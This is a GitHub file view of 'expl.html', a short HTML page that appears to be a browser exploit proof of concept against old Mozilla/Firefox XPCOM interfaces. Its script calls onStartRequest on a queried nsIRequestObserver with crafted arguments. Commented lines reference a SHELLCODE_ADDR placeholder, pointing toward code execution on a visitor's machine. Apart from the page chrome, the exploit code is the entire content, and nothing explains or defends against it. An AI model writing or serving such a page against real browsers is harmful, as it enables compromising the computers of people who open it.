- Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathexpl.html
More file actions
Latest commit
15 lines (12 loc) · 394 Bytes
/
Copy pathexpl.html
File metadata and controls
15 lines (12 loc) · 394 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
<html>
<body>
<objectid="dupa">
<script>
RIINDC=document.getElementById("dupa");
RIINDC.QueryInterface(Components.interfaces.nsIRequestObserver);
//RIINDC.mchannel=SHELLCODE_ADDR
RIINDC.onStartRequest(null,RIINDC.QueryInterface(Components.interfaces.nsISupports));
//RIINDC.onStartRequest(RIINDC.mchannel,DWCJWL.QueryInterface(Components.interfaces.nsISupports));
</script>
</body>
</html>